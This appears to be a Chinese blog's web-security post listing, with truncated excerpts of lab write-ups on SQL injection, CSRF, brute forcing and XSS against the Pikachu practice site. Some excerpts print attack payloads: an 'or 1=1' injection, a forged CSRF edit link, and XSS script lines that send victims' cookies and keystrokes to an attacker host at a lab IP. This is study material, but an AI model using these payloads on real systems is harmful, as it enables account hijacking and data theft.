![](https://img-blog.csdnimg.cn/20201014180756916.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
蟹黄汤包_
坚持月更的博主一枚。
展开
-
SQL注入:基本的sql注入类型(数字,字符,搜索,xx)
0x0 数字型传入后台的是数字我们可以猜猜看,数据库的查询语法应该是这样的因为是post请求,我们不能在url上直接测试,需要用burp抓包查看。抓包后send到repeater里,将id=1修改为id=1 or 1=1点击go,返回的http响应码是200,请求被成功地完成。于是我们如愿找到显示的字符段数据库里的所有信息全部被遍历出来。0x1 字符型数据库查询时拼接的变量是字符串根据以上的显示信息,我们可以猜想查询语句是这样的我们针对这个字符型构造一个payload,根据我原创 2020-05-20 11:49:04 · 750 阅读 · 0 评论 -
SQL注入:概念与原理
转载 2020-05-19 09:43:30 · 228 阅读 · 0 评论 -
CSRF:修改用户的个人信息(get/post方式)/源码分析token的防范
GET 方式:0x0 攻击者Kobe先在网站上注册一个账号,进入修改信息界面:0x1 用burp抓包发现是get方式,而且没有token验证。0x2 直接构造恶意链接即可127.0.0.1/pika/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18912121212&add=WuHan&email=kobe%40pikachu.com&submit=submit目标主机只要点击了链接就会被修改。前端提原创 2020-05-17 10:55:43 · 1050 阅读 · 0 评论 -
CSRF:概念与原理
重点学习如何确认有CSRF漏洞转载 2020-05-16 18:20:00 · 259 阅读 · 1 评论 -
XSS攻击:简单的盲打实验
什么是盲打?就是提交的恶意js给后台,但前端是看不见的,我们就不知道这里是否有漏洞。比如意见箱:但是值得试试,因为一旦管理员进入后台查看,就会中招我们这里重复做获取管理员cookie这个实验,获取了管理员的cookie危害很大,攻击者可以用这个管理员cookie免密登入:目标主机:win10 192.168.56.133攻击主机:win10 192.168.56.132构造payload<script>document.location = 'http://192.168.56原创 2020-05-13 16:57:39 · 354 阅读 · 0 评论 -
xss攻击:记录用户按键实验
目标主机:win10 192.168.56.133攻击主机:win10 192.168.56.1320x0:在有xss漏洞的的网页上写下<script src="http://192.168.56.132/pika/pkxss/rkeypress/rk.js"></script>0x1获取用户的按键,发送到攻击者的后台主要功能就是获取用户的按键:String.fromCharCode(event.keyCode);然后再异步发送到攻击者的后台http://192.168原创 2020-05-12 12:18:56 · 430 阅读 · 0 评论 -
XSS攻击:获取用户的cookie(post方式)
上一篇我们聊到的get方式,攻击者是制作一个让表单填写好值的链接让用户去点击。 但是当表单的提交方式为post,攻击者不能直接制作一个恶意链接让用户触发获取cookie的js脚本。这时候攻击者会制作一个新的链接,让用户点击后能够默认填写好值后自动提交。下面我们来看看代码:<html>&...原创 2020-05-07 21:11:58 · 1522 阅读 · 0 评论 -
XSS攻击:获取用户的cookie(get方式)
关于XSS攻击是什么,想必大家都知道了,今天围绕百度随便找的一张流程图来完成一个获取用户的cookie的XSS实验。为了和上图数字一致好看些,从序号1开始吧0x1 用户登入自行登入。坑自己就可以了,不要坑别人哈。0x2 找到漏洞点,制作一个危险的url让前端插入的js是:<script>document.location = 'http://127.0.0.1/pik...原创 2020-05-06 18:35:17 · 3874 阅读 · 0 评论 -
暴力破解实验2 简单的前端后端验证码绕过
0x0 为什么要设置验证码?1.上一个实验里我们用intruder模块实现了多次提交账号密码,为了防止黑客进行多次暴力破解,水军无限制发贴,机器抢票等等影响网站的行为的守门员。0x1 验证码验证流程一。登入生成验证码1.后台算法生成一张图片,图片response给客户端2.算法生成的值储存进SESSION中二。校验1.客户端提交验证码2.后台对比SESSION与提交的验证码的值三...原创 2020-05-03 22:31:12 · 2182 阅读 · 0 评论 -
暴力破解实验1 (burp suite intruder模块初见)
使用proxy捉到包后,右键将它send到intruder模块中0x01 测试字典name.txtadminrootuserkobelucylilitestpwd.txtaaaaaa999999000000123456111111abc1230x02 破解模式intruder的position有4种模式sniper:对单个变量进行替换,如果有2个以上的变量,也...原创 2020-05-02 00:11:31 · 429 阅读 · 0 评论 -
Burp Suite不能拦截localhost,127.0.0.1
转载自:https://blog.csdn.net/weixin_45396639/article/details/104379312?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2&depth_1-utm_source=distribute.pc_relevant.none-task-blog...转载 2020-05-01 18:04:57 · 1097 阅读 · 1 评论